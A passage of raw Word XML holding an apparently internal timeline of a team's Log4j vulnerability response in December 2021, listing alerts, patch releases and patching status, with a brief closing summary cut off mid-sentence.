            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77AB7005" w14:textId="0043E391" w:rsidR="00B67B3A" w:rsidRDefault="00174779" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBD0C73" w14:textId="7C38910A" w:rsidR="00B67B3A" w:rsidRDefault="00174779" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal DevOps team</w:t>
            </w:r>
            <w:r w:rsidR="00085219">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve"> alerted </w:t>
            </w:r>
            <w:r w:rsidR="006679A3">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>every team to look after this vulnerability in our respective projects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E01EC" w14:paraId="63896C8A" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B2CC4F" w14:textId="1C23FC31" w:rsidR="006679A3" w:rsidRDefault="007A2C78" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>13-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5654B456" w14:textId="03B3F200" w:rsidR="006679A3" w:rsidRDefault="007A2C78" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4647C231" w14:textId="77777777" w:rsidR="006679A3" w:rsidRDefault="007A2C78" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Released a patch Log4j 2.16.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AF02A4" w14:textId="77777777" w:rsidR="00E71DB8" w:rsidRDefault="00E71DB8" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A972595" w14:textId="3FECA8A9" w:rsidR="00E71DB8" w:rsidRDefault="00E71DB8" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750F3F92" wp14:editId="1D5F362E">
                  <wp:extent cx="3688416" cy="1165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06" cy="1173064"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="642F1F67" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56434B2A" w14:textId="4CABDA57" w:rsidR="00591783" w:rsidRDefault="00591783" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>14-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA76179" w14:textId="3AC61950" w:rsidR="00591783" w:rsidRDefault="00591783" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26534948" w14:textId="34803B15" w:rsidR="00591783" w:rsidRDefault="00591783" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>All our application flags are turned to Green</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000974B4" w14:paraId="26D3D32D" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D57538F" w14:textId="4058741B" w:rsidR="00E71DB8" w:rsidRDefault="008F0230" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>17-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A2D45E0" w14:textId="52C2B6AD" w:rsidR="00E71DB8" w:rsidRDefault="006A00A6" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Zero-Day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DE93AA" w14:textId="3B5258BB" w:rsidR="00E71DB8" w:rsidRDefault="006A00A6" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve">Identified a vulnerability in the Patch log4j 2.15.0 but the issue is already fixed in the recent patch </w:t>
            </w:r>
            <w:r w:rsidR="009F535D">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>log4j 2.16.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="11779845" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD63FDC" w14:textId="7D2F98AA" w:rsidR="00EF3156" w:rsidRPr="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>-Dec-2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8DCDC5" w14:textId="4CC2D6D8" w:rsidR="00EF3156" w:rsidRPr="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>FRIDAY</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1BC572" w14:textId="61F0E29A" w:rsidR="00EF3156" w:rsidRPr="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Internal </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D72A02C" w14:textId="71321DA9" w:rsidR="00EF3156" w:rsidRPr="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Internal DevOps team alerted every team to look after this </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3156">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>vulnerability in our respective projects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="53B05578" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C568BCC" w14:textId="0782F869" w:rsidR="009F535D" w:rsidRDefault="00A62414" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>17-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3DD479" w14:textId="0AAE454C" w:rsidR="009F535D" w:rsidRDefault="00A62414" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520CE4BF" w14:textId="745C4A21" w:rsidR="009F535D" w:rsidRDefault="00A62414" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve"> All our applications are</w:t>
            </w:r>
            <w:r w:rsidR="00411D3B">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve"> patched with the new log4j 2.16.0 patch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="1E24A603" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D7B5B2" w14:textId="77777777" w:rsidR="00411D3B" w:rsidRDefault="00411D3B" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>17-Dec-2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3A736F" w14:textId="329A8FA6" w:rsidR="00411D3B" w:rsidRPr="00411D3B" w:rsidRDefault="00411D3B" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00411D3B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>(FRIDAY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236B5419" w14:textId="33465894" w:rsidR="00411D3B" w:rsidRDefault="00411D3B" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Zero-Day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="678616C6" w14:textId="7273A04A" w:rsidR="00411D3B" w:rsidRDefault="008854C4" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Identified a vulnerability in log4j 216.0 as well</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="37B59C8B" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3037CECA" w14:textId="32A1ECF6" w:rsidR="00A1356F" w:rsidRDefault="00A1356F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>17-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6804E842" w14:textId="586210F0" w:rsidR="00A1356F" w:rsidRDefault="00A1356F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67EFB46C" w14:textId="77777777" w:rsidR="00A1356F" w:rsidRDefault="00A1356F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Released a patch Log4j 2.17.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="249F9157" w14:textId="77777777" w:rsidR="00A1356F" w:rsidRDefault="00A1356F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ED0AB9C" w14:textId="287A6F37" w:rsidR="00A1356F" w:rsidRDefault="000974B4" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013680E6" wp14:editId="00740399">
                  <wp:extent cx="3788410" cy="1220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6866" cy="1233365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C095B4E" w14:textId="0E00C6BC" w:rsidR="009E01EC" w:rsidRDefault="009E01EC" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4ED4D677" w14:textId="77777777" w:rsidR="009E01EC" w:rsidRDefault="009E01EC" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="702B2388" w14:textId="77777777" w:rsidR="009E01EC" w:rsidRDefault="009E01EC" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F4F13C1" w14:textId="434068D0" w:rsidR="009E01EC" w:rsidRDefault="009E01EC" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1901C53D" wp14:editId="67259964">
                  <wp:extent cx="3780790" cy="942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5718" cy="948267"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="0E1352D4" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBE71C8" w14:textId="77777777" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>20-Dec-2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCE1F2A" w14:textId="1799348F" w:rsidR="00EF3156" w:rsidRPr="000974B4" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000974B4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>(MONDAY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="678E7FC6" w14:textId="39C1B8AF" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60C8AFF6" w14:textId="57D6E6D8" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal DevOps team alerted every team to look after this vulnerability in our respective projects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="4A46CC03" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795D3244" w14:textId="3F858D3A" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075E6506" w14:textId="79B5F60E" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Internal Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5656A5" w14:textId="62617979" w:rsidR="00EF3156" w:rsidRDefault="00EF3156" w:rsidP="00EF3156">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>All our application flags are turned to Green</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve"> one more final time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60297FB0" w14:textId="03D37F1F" w:rsidR="00623148" w:rsidRPr="001C7DD2" w:rsidRDefault="00623148" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7DD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>PS: All the vulnerability raised is on FRIDAY!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1AD64" w14:textId="53A3355F" w:rsidR="00C4097E" w:rsidRPr="001C7DD2" w:rsidRDefault="006F17D0" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7DD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4j release snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37434FC9" w14:textId="3B9D48FC" w:rsidR="006F17D0" w:rsidRDefault="00292238" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C05BF05" wp14:editId="473F6C97">
            <wp:extent cx="5731510" cy="2469515"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2469515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2B108" w14:textId="77777777" w:rsidR="00292238" w:rsidRDefault="00292238">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8F2462" w14:textId="3775F420" w:rsidR="00C4097E" w:rsidRDefault="00176D5E" w:rsidP="00176D5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">In a nutshell, </w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>everyone</w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been using log4j </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">lookups </w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">for at least 8–9 years without realising whether their system is being </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>exploited</w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> by that</w:t>
      </w:r>
      <w:r w:rsidR="0056279E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> until it is publicly announced on </w:t>
      </w:r>
      <w:r w:rsidR="001C7DD2">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>10-DEC-2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>. Nobody is certain if hackers were aware of it</w:t>
      </w:r>
      <w:r w:rsidR="00FA2D43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
